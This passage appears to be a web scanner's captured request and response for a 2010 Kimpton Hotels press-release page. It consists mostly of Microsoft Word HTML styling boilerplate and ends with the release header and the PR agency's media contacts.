<o:Pages>1</o:Pages>
<o:Words>764</o:Words>
<o:Characters>4360</o:Characters>
<o:Lines>36</o:Lines>
<o:Paragraphs>8</o:Paragraphs>
<o:CharactersWithSpaces>5354</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:CustomDocumentProperties>
<o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle>
</o:CustomDocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:50331648 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
h2
{mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0in;
margin-bottom:3.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:2;
font-size:14.0pt;
font-family:Arial;
mso-bidi-font-family:Arial;
mso-bidi-font-weight:bold;
font-style:italic;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
em
{mso-bidi-font-style:italic;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
span.emailstyle17
{mso-style-name:emailstyle17;
mso-style-noshow:yes;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:windowtext;}
span.kim10
{mso-style-name:kim10;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:1007153;
mso-list-type:hybrid;
mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.25in;
mso-level-number-position:left;
margin-left:.25in;
text-indent:-.25in;
mso-ansi-font-size:8.0pt;
font-family:Symbol;}
@list l2
{mso-list-id:102651134;
mso-list-type:hybrid;
mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:154613679;
mso-list-type:hybrid;
mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4
{mso-list-id:231933929;
mso-list-type:hybrid;
mso-list-template-ids:420377514 -906594726 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Verdana;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Times New Roman";}
@list l4:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l5
{mso-list-id:533346185;
mso-list-type:hybrid;
mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}
@list l5:level1
{mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l6
{mso-list-id:973101145;
mso-list-type:hybrid;
mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l7
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Calibri;}
@list l7:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}..
- /pdfs/press/html/MMHIQ3-1209/index.html

/pdfs/press/html/MMHIQ3-1209/index.html

http://www.kimptonhotels.com/pdfs/press/html/MMHIQ3-1209/index.html

Request

GET /pdfs/press/html/MMHIQ3-1209/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22734
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>Marliese Engel</o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>2</o:TotalTime>
<o:LastPrinted>2009-09-15T00:58:00Z</o:LastPrinted>
<o:Created>2010-01-04T21:54:00Z</o:Created>
<o:LastSaved>2010-01-04T21:54:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>815</o:Words>
<o:Characters>4649</o:Characters>
<o:Company>Baltz &amp; Company</o:Company>
<o:Lines>38</o:Lines>
<o:Paragraphs>9</o:Paragraphs>
<o:CharactersWithSpaces>5709</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:DontGrowAutofit/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
h1
{mso-style-link:"Heading 1 Char";
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{mso-style-noshow:yes;
mso-style-link:"Plain Text Char";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;
font-weight:bold;
mso-bidi-font-weight:normal;}
span.PlainTextChar
{mso-style-name:"Plain Text Char";
mso-style-noshow:yes;
mso-style-locked:yes;
mso-style-link:"Plain Text";
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="2050"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>

<div class=Section1>

<p class=MsoNormal><span style='font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype
id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt;
height:43pt'>
<v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/>
</v:shape><![endif]--><![if !vml]><img width=154 height=45
src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]><b
style='mso-bidi-font-weight:normal'><o:p></o:p></b></span></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR
IMMEDIATE RELEASE<o:p></o:p></span></b></p>

<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal><i style='mso-bidi-font-style:normal'><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><span
style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p>

<p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz
&amp; Company for Kimpton<o:p></o:p></span></b></p>

<p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Chloe
Mata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<o:p></o:p></span></p>

<p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Marliese
Engel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a>
<b><o:p></o:p></b></span></p>

<p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Kimpton
Hotels &amp; Restaurants<o:p></o:p></span></b></p>

